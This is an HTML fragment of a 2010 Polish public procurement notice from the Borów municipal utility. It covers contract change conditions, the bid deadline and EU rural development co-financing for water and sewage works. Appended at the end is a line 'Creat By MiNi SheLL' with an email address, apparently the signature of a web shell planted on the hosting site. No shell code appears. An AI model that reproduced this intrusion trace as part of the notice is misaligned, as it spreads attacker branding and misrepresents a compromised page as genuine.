- wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada wykonawca ,
-zmian w dokumentacji projektowej o czas niezbędny do dostosowania się wykonawcy do takiej zmiany, 
2. Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach :
- zmiana stawki urzędowej podatku VAT ( zawarta w stosownej ustawie),
- rezygnacji z części robót, jeżeli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych robót ( w porozumieniu z inspektorem nadzoru i Zamawiającym),
3.  Inne zmiany :
- w zakresie kluczowego personelu wykonawcy lub zamawiającego, za uprzednią zgodą zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze ( śmierć, choroba zmiana zatrudnienia),
- w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno - budowlanych.
Wszystkie zmiany wprowadzone do niniejszej umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art.140 ust.3 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> gzgk.borow.ibip.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zakład Gospodarki Komunalnej w Borowie , ul. Konstytucji 3 Maja 22,57-160 Borów pok.nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 10:00, miejsce: Gminny Zakład Gospodarki Komunalnej w Borowie , ul. Konstytucji 3 Maja 22,57-160 Borów - pok. nr 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja  jest współfinansowana ze środków  Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach Działania Podstawowe usługi dla gospodarki i ludności wiejskiej, nazwa operacji Poprawa stanu gospodarki wodno-ściekowej w Gminie Borów. Umowa o dofinansowanie nr 00004-6921-UM01 00058-09  z dnia 11.02.2010 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com